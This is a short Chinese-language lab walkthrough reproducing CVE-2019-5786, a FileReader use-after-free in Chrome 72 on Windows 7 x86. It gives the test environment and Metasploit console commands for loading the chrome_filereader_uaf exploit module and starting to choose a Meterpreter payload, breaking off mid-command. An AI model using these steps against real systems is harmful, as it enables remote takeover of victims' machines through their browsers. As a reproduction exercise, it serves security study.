漏洞影响范围:
CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。
环境
kali
win7 x86
Google_Chrome_(32bit)_v72.0.3626.119
复现
kali启动msf,搜索chrome_filereader利用模块
root@kali:~# msfconsole -q
msf5 > search chrome_filereader
选择模块,查看模块信息
msf5 > use exploit/windows/browser/chrome_filereader_uaf
msf5 exploit(windows/browser/chrome_filereader_uaf) > info
漏洞介绍
选择payload
msf5 exploit(windows/browser/chrome_filereader_uaf) > set payload windows/meterpreter/